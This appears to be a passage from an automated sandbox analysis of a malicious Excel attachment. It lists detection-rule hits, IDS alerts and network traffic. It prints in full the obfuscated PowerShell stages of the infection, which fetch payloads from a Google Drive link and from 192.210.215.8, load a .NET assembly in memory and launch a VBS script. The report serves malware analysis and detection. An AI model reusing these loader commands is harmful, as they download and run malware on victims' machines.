-REPLaCE([CHAr]71+[CHAr]50+[CHAr]78),[CHAr]36-REPLaCE'm87',[CHAr]39-CrepLAcE ([CHAr]67+[CHAr]73+[CHAr]75),[CHAr]124) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". 
( $eNv:comSpeC[4,15,25]-join'') ( (('G2NimageUrl = m87https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvU'+'hBYwur m87;G2NwebClient = New-Object System.Net.WebClient;G2NimageBytes = G2NwebClient.DownloadData(G2NimageUrl);G2Nimage'+'Text = [System.Text.Encodi'+'ng]::UTF8.GetString(G2NimageByte'+'s);G2NstartFlag = m87<<BASE64_START>>m87;G2NendFlag = m87<<BASE64_END>>m'+'87;G2NstartIndex'+' = '+'G2Nim'+'ageText.IndexOf(G2NstartFlag);G2NendIndex = G2NimageText'+'.IndexOf'+'(G2NendFlag);G2NstartInd'+'ex '+'-ge 0 -and'+' G2NendIndex -gt G2NstartIndex;G2NstartIndex += G2NstartFlag.Le'+'ngth;G2Nbase64Length = G2NendIndex - G2NstartIndex;G2Nbase64C'+'ommand = G2NimageText.'+'Substring(G2Nst'+'artIn'+'dex, G2Nbase64Leng'+'th);G2Nbase64Reve'+'rsed = -join'+' (G2Nb'+'ase64Command.ToCharArray() '+'CIK ForEach-Object { G2N_ })[-1..-(G2Nbase64Command.Length)]'+';G2NcommandBytes = [System.Convert]::F'+'romBase64String(G2Nbase64Reversed);G2NloadedAssemb'+'ly = '+'[Syst'+'em.Reflection.As'+'sembly]::Load(G2NcommandBytes);G2NvaiMethod = [dnlib.IO.Home].GetMethod(m87VAIm87);G2NvaiMethod.Invoke(G2Nnull, @(m87txt.RDFFRE'+'/045'+'/8.512.012.291//:ptthm87,
      Source: Process started; Author: Michael Haag; Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdbestthingswithniceworkgreat.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdbestthingswithniceworkgreat.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\syStem32\wiNdOWSPOwErsHElL\v1.0\POWeRshElL.eXE" "PoWeRSheLl.Exe -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt ; iEx($(Iex('[SysTem.TEXT.ENcoDIng]'+[chAR]58+[CHaR]0x3A+'Utf8.gETSTRING([SYStEM.COnVErT]'+[Char]58+[CHar]0x3a+'frOMbaSE64StrInG('+[cHar]34+'[Base64 blob removed]'+[CHAr]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3772, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdbestthingswithniceworkgreat.vbS" , ProcessId: 4080, ProcessName: wscript.exe
      Source: File created; Author: frack113; Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3772, TargetFilename: C:\Users\user\AppData\Local\Temp\td4qmpaq\td4qmpaq.cmdline
      Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3404, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
      Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\syStem32\wiNdOWSPOwErsHElL\v1.0\POWeRshElL.eXE" "PoWeRSheLl.Exe -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt ; iEx($(Iex('[SysTem.TEXT.ENcoDIng]'+[chAR]58+[CHaR]0x3A+'Utf8.gETSTRING([SYStEM.COnVErT]'+[Char]58+[CHar]0x3a+'frOMbaSE64StrInG('+[cHar]34+'[Base64 blob removed]'+[CHAr]0X22+'))')))", CommandLine: "C:\Windows\syStem32\wiNdOWSPOwErsHElL\v1.0\POWeRshElL.eXE" "PoWeRSheLl.Exe -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt ; iEx($(Iex('[SysTem.TEXT.ENcoDIng]'+[chAR]58+[CHaR]0x3A+'Utf8.gETSTRING([SYStEM.COnVErT]'+[Char]58+[CHar]0x3a+'frOMbaSE64StrInG('+[cHar]34+'[Base64 blob removed]
      Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $eNv:comSpeC[4,15,25]-join'') ( (('G2NimageUrl = m87https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvU'+'hBYwur m87;G2NwebClient = New-Object System.Net.WebClient;G2NimageBytes = G2NwebClient.DownloadData(G2NimageUrl);G2Nimage'+'Text = [System.Text.Encodi'+'ng]::UTF8.GetString(G2NimageByte'+'s);G2NstartFlag = m87<<BASE64_START>>m87;G2NendFlag = m87<<BASE64_END>>m'+'87;G2NstartIndex'+' = '+'G2Nim'+'ageText.IndexOf(G2NstartFlag);G2NendIndex = G2NimageText'+'.IndexOf'+'(G2NendFlag);G2NstartInd'+'ex '+'-ge 0 -and'+' G2NendIndex -gt G2NstartIndex;G2NstartIndex += G2NstartFlag.Le'+'ngth;G2Nbase64Length = G2NendIndex - G2NstartIndex;G2Nbase64C'+'ommand = G2NimageText.'+'Substring(G2Nst'+'artIn'+'dex, G2Nbase64Leng'+'th);G2Nbase64Reve'+'rsed = -join'+' (G2Nb'+'ase64Command.ToCharArray() '+'CIK ForEach-Object { G2N_ })[-1..-(G2Nbase64Command.Length)]'+';G2NcommandBytes = [System.Convert]::F'+'romBase64String(G2Nbase64Reversed);G2NloadedAssemb'+'ly = '+'[Syst'+'em.Reflection.As'+'sembly]::Load(G2NcommandBytes);G2NvaiMethod = [dnlib.IO.Home].GetMethod(m87VAIm87);G2NvaiMethod.Invoke(G2Nnull, @(m87txt.RDFFRE'+'/045'+'/8.512.012.291//:ptthm87, m87de'+'sativadom87, m'+'87desativa'+'dom87, m87desativadom87, m87AddInProcess32m87, m8'+'7desativadom87, m8'+'7desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desati'+'vadom87,m871m87,m87desativadom87));') -REPLaCE([CHAr]71+[CHAr]50+[CHAr]78),[CHAr]36-REPLaCE'm87',[CHAr]39-CrepLAcE ([CHAr]67+[CHAr]73+[CHAr]75),[CHAr]124) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". 
( $eNv:comSpeC[4,15,25]-join'') ( (('G2NimageUrl = m87https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvU'+'hBYwur m87;G2NwebClient = New-Object System.Net.WebClient;G2NimageBytes = G2NwebClient.DownloadData(G2NimageUrl);G2Nimage'+'Text = [System.Text.Encodi'+'ng]::UTF8.GetString(G2NimageByte'+'s);G2NstartFlag = m87<<BASE64_START>>m87;G2NendFlag = m87<<BASE64_END>>m'+'87;G2NstartIndex'+' = '+'G2Nim'+'ageText.IndexOf(G2NstartFlag);G2NendIndex = G2NimageText'+'.IndexOf'+'(G2NendFlag);G2NstartInd'+'ex '+'-ge 0 -and'+' G2NendIndex -gt G2NstartIndex;G2NstartIndex += G2NstartFlag.Le'+'ngth;G2Nbase64Length = G2NendIndex - G2NstartIndex;G2Nbase64C'+'ommand = G2NimageText.'+'Substring(G2Nst'+'artIn'+'dex, G2Nbase64Leng'+'th);G2Nbase64Reve'+'rsed = -join'+' (G2Nb'+'ase64Command.ToCharArray() '+'CIK ForEach-Object { G2N_ })[-1..-(G2Nbase64Command.Length)]'+';G2NcommandBytes = [System.Convert]::F'+'romBase64String(G2Nbase64Reversed);G2NloadedAssemb'+'ly = '+'[Syst'+'em.Reflection.As'+'sembly]::Load(G2NcommandBytes);G2NvaiMethod = [dnlib.IO.Home].GetMethod(m87VAIm87);G2NvaiMethod.Invoke(G2Nnull, @(m87txt.RDFFRE'+'/045'+'/8.512.012.291//:ptthm87,
      Source: File created, Author: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3772, TargetFilename: C:\Users\user\AppData\Local\Temp\jsnmpiob.0rn.ps1

      Data Obfuscation

      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\td4qmpaq\td4qmpaq.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\td4qmpaq\td4qmpaq.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\syStem32\wiNdOWSPOwErsHElL\v1.0\POWeRshElL.eXE" "PoWeRSheLl.Exe -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt ; iEx($(Iex('[SysTem.TEXT.ENcoDIng]'+[chAR]58+[CHaR]0x3A+'Utf8.gETSTRING([SYStEM.COnVErT]'+[Char]58+[CHar]0x3a+'frOMbaSE64StrInG('+[cHar]34+'JGJxbElEWUQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNQmVyREVmaW5pdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYdHJiSHMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBubGNyLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR3l2cix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJicSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpYYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGJxbElEWUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMjEwLjIxNS44LzU0MC9jcmVhdGVkYmVzdHRoaW5nc3dpdGhuaWNld29ya2dyZWF0aC50SUYiLCIkRW5
WOkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMiLDAsMCk7U1RhUlQtc0xlZVAoMyk7c3RBclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMi'+[CHAr]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3772, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\td4qmpaq\td4qmpaq.cmdline", ProcessId: 3980, ProcessName: csc.exe
      Timestamp                        SID      Severity  Classtype                      Source IP       Source Port  Destination IP  Destination Port  Protocol
      2024-10-24T08:39:29.928661+0200  2024197  1         A Network Trojan was detected  192.210.215.8   80           192.168.2.22    49162             TCP
      2024-10-24T08:39:33.317474+0200  2024197  1         A Network Trojan was detected  192.210.215.8   80           192.168.2.22    49164             TCP
      2024-10-24T08:39:29.928648+0200  2024449  1         Attempted User Privilege Gain  192.168.2.22    49162        192.210.215.8   80                TCP
      2024-10-24T08:39:33.317459+0200  2024449  1         Attempted User Privilege Gain  192.168.2.22    49164        192.210.215.8   80                TCP
      2024-10-24T08:39:54.716795+0200  2024449  1         Attempted User Privilege Gain  192.168.2.22    49170        192.210.215.8   80                TCP
      2024-10-24T08:40:06.632900+0200  2049038  1         A Network Trojan was detected  142.250.186.97  443          192.168.2.22    49172             TCP
      2024-10-24T08:40:14.905847+0200  2049038  1         A Network Trojan was detected  142.250.186.97  443          192.168.2.22    49174             TCP


      AV Detection

      Source: A & C Metrology OC 5457144.xls, ReversingLabs: Detection: 18%
      Source: A & C Metrology OC 5457144.xls, Joe Sandbox ML: detected
      Source: unknown, HTTPS traffic detected: 216.58.212.174:443 -> 192.168.2.22:49171 version: TLS 1.0
      Source: unknown, HTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.22:49172 version: TLS 1.0
      Source: unknown, HTTPS traffic detected: 216.58.212.174:443 -> 192.168.2.22:49173 version: TLS 1.0
      Source: unknown, HTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.22:49174 version: TLS 1.0
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
      Source: unknown, HTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49161 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49163 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49169 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49168 version: TLS 1.2
      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\mans504x\mans504x.pdb source: powershell.exe, 00000011.00000002.488335048.00000000026E4000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\mans504x\mans504x.pdbhP source: powershell.exe, 00000011.00000002.488335048.00000000026E4000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\td4qmpaq\td4qmpaq.pdbhP source: powershell.exe, 00000005.00000002.458032894.0000000002351000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\td4qmpaq\td4qmpaq.pdb source: powershell.exe, 00000005.00000002.458032894.0000000002351000.00000004.00000800.00020000.00000000.sdmp

      Software Vulnerabilities

      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Process created: C:\Windows\System32\mshta.exe
      Source: C:\Windows\System32\wscript.exe, Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: global traffic, DNS query: name: u4u.kids
      Source: global traffic, DNS query: name: drive.google.com
      Source: global traffic, DNS query: name: drive.usercontent.google.com
      Source: global traffic, TCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
      Source: global traffic, TCP traffic: 192.168.2.22:49163 -> 24.199.88.84:443
      Source: global traffic, TCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
      Source: global traffic, TCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 216.58.212.174:443
      Source: global traffic, TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global traffic, TCP traffic: 192.168.2.22:49173 -> 216.58.212.174:443
      Source: global traffic, TCP traffic: 192.168.2.22:49174 -> 142.250.186.97:443
      Source: global traffic, TCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global traffic, TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global traffic, TCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
      Source: global traffic, TCP traffic: 192.168.2.22:49170 -> 192.210.215.8:80
      Source: global traffic, TCP traffic: 192.168.2.22:49175 -> 192.210.215.8:80
      Source: global traffic, TCP traffic: 192.168.2.22:49176 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
